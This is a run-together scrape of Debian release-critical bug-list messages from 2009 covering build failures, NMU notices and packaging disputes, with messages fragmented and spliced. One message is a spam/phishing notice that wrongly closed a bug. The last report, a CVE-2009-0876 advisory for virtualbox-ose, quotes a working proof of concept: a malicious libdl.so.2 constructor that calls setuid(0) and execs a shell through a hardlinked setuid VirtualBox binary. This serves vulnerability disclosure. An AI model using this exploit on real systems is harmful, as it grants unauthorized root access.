Aurelien Jarno offered his assitance to try to > reproduce the problem, though he’s busy and may take a bit until he gets > around to it. we had a similar problem with ffmpeg on mips, which was fixed in 0.svn20080206-13. From the changelog entry: [Thiemo Seufer] * compile shared libavcodec explicitly with $(PIC), since gcc-4.3 mips/mipsel needs an explicit PIC flag for shared library code. . Until gcc-4.2 Linux/MIPS always used PIC code, even for executables. This changed with gcc-4.3, and with it the compiler default changed to non-PIC. As a result, -fPIC now needs to be explicitly supplied for shared library builds. . (Closes: #498216, 498647, 498397) Maybe there is a similar problem in mplayer's configure script? The fix was after all in ffmpeg's configure script, which is reimplemented in mplayer. But TBH, I currently have the fear that the problem could be one of our patches that we carry, namely 30link-system-ffmpeg.patch. At least that patch has a direct effect on the gcc call that is failing. Could some of the mips porters please try to build the mplayer package with that patch disabled, and send the buildlog to this bug? This will result in not using the system ffmpeg but the internal copy. But this would at least verify if the patch is buggy or not. -- Gruesse/greetings, Reinhard Tartler, KeyID 945348A4 -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Bug#516218: getaddrinfo not working while gethostbyname works
My DSL router also triggered this issue. I just want to add the note that for me, getaddrinfo does occasionally return correct results, indicating that the flakiness of the DNS server is timing dependent. Bug#512463: intend to NMU
usertag 512463 + intend-to-nmu thanks hey, As this bug has been open with a patch for over a month and without a rejection from the maintainer, I intend to NMU the associated package in a week's time (or sooner, if requested by the maintainer). If you do not wish for this NMU to occur, please send a follow-up in the bug report stating as such or, better yet, fix it in an MU :) Unless you request otherwise, any NMUs I upload will be to the DELAYED queue, so you will have an additional week to supersede my upload with an MU to prevent it from entering unstable. -- dann frazier -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". I've cc'd cola's debian package maintainer in case there's anything that needs to be done on the packaging front to account for the path change from using /usr/lib/python2.*/site-packages/cola to /usr/share/cola/lib for cola's private modules. Bug#520189: nspluginwrapper does not work on kernel 2.6.26
Package: nspluginwrapper Version: 1.3.0-1 Severity: serious nspluginwrapper currently does not work at all on my system; I believe this has to do with a kernel 2.6.27-specific flag passed to socket() now, but I'm not entirely sure. This is especially bad given that the default kernel in both squeeze and sid is 2.6.26, but this package should work regardless of the particular 2.6 kernel version. -- System Information: Debian Release: squeeze/sid APT prefers testing APT policy: (600, 'testing'), (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-1-amd64 (SMP w/1 CPU core) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages nspluginwrapper depends on: ii debconf 1.5.26 Debian configuration management sy ii ia32-libs2.7 ia32 shared libraries for use on a ii ia32-libs-gtk2.7 GTK+ ia32 shared libraries ii lib32gcc11:4.3.3-3 GCC support library (32 bit Versio ii libatk1.0-0 1.22.0-1The ATK accessibility toolkit ii libc62.9-4 GNU C Library: Shared libraries ii libc6-i386 2.9-4 GNU C Library: 32bit shared librar ii libcairo21.8.6-2 The Cairo 2D vector graphics libra ii libcurl3-gnutls 7.18.2-8.1 Multi-protocol file transfer libra ii libglib2.0-0 2.18.4-2The GLib library of C routines ii libgtk2.0-0 2.14.7-4+b1 The GTK+ graphical user interface ii libpango1.0-01.22.4-2Layout and rendering of internatio ii libx11-6 2:1.1.5-2 X11 client-side library ii libxt6 1:1.0.5-3 X11 toolkit intrinsics library ii util-linux [linux32] 2.13.1.1-1 Miscellaneous system utilities nspluginwrapper recommends no packages. nspluginwrapper suggests no packages. -- debconf information: * nspluginwrapper/auto_update: true -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Bug#512750: marked as done (request-tracker3.6: SQLite is unsupported, documentation needed)
Your message dated Wed, 18 Mar 2009 01:00:55 +0100 with message-id <20090318010055.51scpesxcsogo...@webmail.unina.it> and subject line Improtant Notice!! has caused the Debian Bug report #512750, regarding request-tracker3.6: SQLite is unsupported, documentation needed to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 512750: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=512750 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: request-tracker3.6 Version: 3.6.7-4 Severity: serious Justification: maintainer's opinion By default 'apt-get install request-tracker3.6' will pull in rt3.6-db-sqlite as the first choice, and users opting for automatic database management (dbconfig-common) will get an SQLite installation with no further (database-related) questions. This is unfortunate because upstream considers the SQLite database backend unsupported and intended for development and testing purposes only. The default database choice was thus a bad call on my part, as I have recently realized. My rationale for the choice was to get a working installation automatically, and SQLite is just about the only way to do that currently. It mostly works and we have received no bug reports about it, but upstream says it has a few known problems. While some people will probably realize they should use MySQL or PostgreSQL for production installations, this leaves the rest with an installation that's officially unsupported. And naturally many of them are going to go to the upstream rt-users list for support anyway. It is too late to change the functionality for Lenny, the only thing we can do is to add documentation. As discussed with upstream, the plan is to insert prominent warnings in the request-tracker3.6 and rt3.6-db-sqlite package descriptions and README.Debian. Also, we intend to put a recipe for mysql/pg migration on the web at http://pkg-request-tracker.alioth.debian.org/ and make README.Debian point there. This way we can improve the recipe even after the release and upstream can refer the end users there. I'm setting the initial severity to 'serious': not getting these changes in lenny means we need to discuss if dropping RT from the release altogether is the next best alternative. We intend to get a fixed package in sid RSN, so hopefully it doesn't come to that. -- Niko Tyni nt...@debian.org --- End Message --- --- Begin Message --- ATTENTION:EARTH USERS , This mail is to inform all our [EARTH] users that your webmail account has been compromised by spammers by gaining access to your webmail account and have been using it for illegal internet activities. Bug#520187: ogdi-dfsg: FTBFS: No libproj-dev
Source: ogdi-dfsg Version: 3.2.0~beta2-1 Severity: serious Hi, Your package is build depending on libproj-dev | proj, and libproj-dev does not exist. This does not work. The buildds will only consider the first alternative, so libproj-dev. Either drop the libproj-dev, or change the order. But I don't see why you have the build dependency on libproj-dev. Or is something else > to take into account that I overlooked? No, I just read your email as the upload was kind of urgent. If it is, I'd propose we go for alpha and sparc using LAM. If it's not, I can fix alpha and sparc in openmpi and upload mpi-defaults with alpha and sparc using Open MPI. I'd prefer this, though I do not know if it's reasonable since we could also go back to Open MPI with a later upload. What is your preferred option? I guess it was a little too much hacking this weekend. Only the ABI is effected, so recompiling will do the trick. No patches involved. As for mpi-defaults, I will delay the upload until the build issue on sparc is solved, which I hope will be soon(ish). The fix seem quite straight forward and I'll be testing it tomorrow night. Your message dated Tue, 17 Mar 2009 21:03:02 + with message-id and subject line Bug#520133: fixed in linphone 3.0.0-3 has caused the Debian Bug report #520133, regarding linphone: spurious build-dependency on gnome-applets to be marked as done. This is particularly grave since linphone is now failing to build due to uninstallability of gnome-applets. It’d be great if you could do a quick upload doing the build-dependency. I’ve verified that linphone builds fine without gnome-applets installed. Please let me know if you need a NMU. This will break other clients, too. For instance, a BIND forwarder without source port randomization, who happens to have multiple queries in flight. Has it been verified that the second DNS packet actually leaves the box? I think there was word of a kernel bug leading to dropped UDP packets which might cause this. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Bug#517975: pdnsd: package update overrides configuration
Hello, On Tue, Mar 17, 2009 at 06:50:46AM +0100, Christian Perrier wrote: > Quoting Alexander Gattin (xr...@yandex.ru): > > P.S. Looks like either I'm missing something between the lines of the Debian Policy or the Policy is insufficient regarding this particular matter: namely, which file _is_ configuration file and which one isn't. IMHO, the current Policy supports my opinion better, and lacks ground for Pierre's one. If we want to give more freedom to Debian package maintainer, the Policy should be modified here (and Pierre will be free to put anything he likes under /usr, call it "internal package file", stick "do not touch!" sign on it and then say "Full stop"). :) The whole issue is not technical, you know, I have absolutely no problem configuring/using/upgrading pdnsd, so it's just a matter of advocacy, definitions and arguments. Regarding the latter, I'm getting short of them, and without external intervention from you or other Debian developers, this discussion will lose sense. -- With best regards, xrgtn (+380501102966/+380636177128/xr...@jabber.kiev.ua) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". After installing the build dependencies for gnuplot in a pbuilder chroot, /var/lib/texmf/web2c/pdftex has no file etex.log OR etex.fmt. The only files in that directory are latex.log, latex.fmt, pdflatex.log, pdflatex.fmt. And there is no directory /var/lib/texmf/web2c/tex at all. Even when I run "mktexfmt --byfmt etex", neither etex.log nor etex.fmt is created anywhere within the chroot. And I notice that by the timestamps in /var/lib/texmf/web2c/pdftex in the root filesystem outside the chroot, {etex, pdfetex, pdftex}.{fmt, log} are about 5 days older than {latex,pdflatex}.{fmt,log}. -- Daniel Schepler -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Hi, It looks like the current version of .frozen-bubble/rc is identical to the version found by ext3grep. So, I guess the answer is no, I don't have a version that would reproduce the problem. I'm currently not able to > solve this, and the Developer of tuxcmd sais that his effort to try > support also powerpc architecture failed in past [1]. The first step you should do is prevent the generation of binary packages on powerpc. There are a few ways to do that: - Restrict the arches list in the control file. This can make sense if upstream says it's not supported, and the source of the problem is this package. It does not make sense if this is a bug in fpc. - Run a test during the build process that tries to detect if it's working or not, and make it fail during the build process, if it doesn't work. - Have a list of arches that work in your rules file, and use that to decide if you continue buiding or not. You can close this bug in the package that prevents the generation of the binary package on powerpc. The next step is asking ftp-master to remove the binary package for powerpc from unstable. As long as the binary package stays it unstable, the scripts will assume something is wrong with the powerpc version and prevent migration to testing. When both those things have been done, the new version should migrate to testing. > Any hint, how I should procede? A new version of the fpc will be > released end of this week, and then tuxcmd should be retried to > build whit the new fpc, but then I need some people with powerpc > which could test that again [2]. You can either ask the buildd maintainers to schedule a binNMU to try with the new version of fpc, or upload a new version. Then you probably want to ask the submitter of this bug to try again. Bug#520133: linphone: spurious build-dependency on gnome-applets
Package: linphone Version: 3.0.0-2 Severity: serious Hello, linphone build-depends on gnome-applets, but this build-dependency (as confirmed with the GNOME maintainers) does not make any sense: with libpanel-applet2-dev (which is already in linphone’s build-dependency list) should be enough. This is particularly grave since linphone is now failing to build due to uninstallability of gnome-applets. It’d be great if you could do a quick upload doing the build-dependency. I’ve verified that linphone builds fine without gnome-applets installed. Please let me know if you need a NMU. Bug#520126: virtualbox-ose: CVE-2009-0876 insecure shared lib loading leads to local privilege escalation
Package: virtualbox-ose Version: 2.1.4-dfsg-1 Severity: critical Tags: security patch Hi, the following CVE (Common Vulnerabilities & Exposures) id was published for virtualbox-ose. CVE-2009-0876[0]: | Unspecified vulnerability in Sun xVM VirtualBox 2.0.0, 2.0.2, 2.0.4, | 2.0.6r39760, 2.1.0, 2.1.2, and 2.1.4r42893 on Linux allows local users | to gain privileges via unknown vectors related to "certain packages." Quoting SpanKY : "hardlinks on Linux preserve permission, including set*id bits, and can be created by non-root users. virtualbox attempts to perform some sanity checks on the dir the binary exists in (presumably to prevent privilege escalation), however that is done after the constructors in shared libs are run. that means any library a virtualbox binary links against is an attack vector. the constructor isnt the only attack vector ... you could also override any of the standard C library functions that virtualbox would call during its startup. like open() or stat() or ... there really isnt many workarounds available here if DT_RPATH:$ORIGIN is continued to be used. perhaps making a small dedicated partition (loopback or whatever) and storing the binaries on there because hardlinks cannot go across partitions. simple example: $ id -u 1002 $ cat test.c #include #include __attribute__((constructor)) void awesome(void) { char *argv[] = { "sh", NULL }; extern char *environ; syscall(SYS_setuid, 0); syscall(SYS_execve, "/bin/sh", argv, environ); } $ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2 $ ls -l /opt/VirtualBox/VirtualBox -r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox $ ln /opt/VirtualBox/VirtualBox $ ls -l VirtualBox -r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox $ ./VirtualBox ./VirtualBox: /home/vapier/libdl.so.2: no version information available (required by ./VirtualBox) sh-4.0# whoami root" Upstream patches are available on: http://www.virtualbox.org/changeset/17171 http://www.virtualbox.org/changeset/17169 http://www.virtualbox.org/changeset/17168 Debian lenny is not affected by this problem as the binaries are not setuid 0.
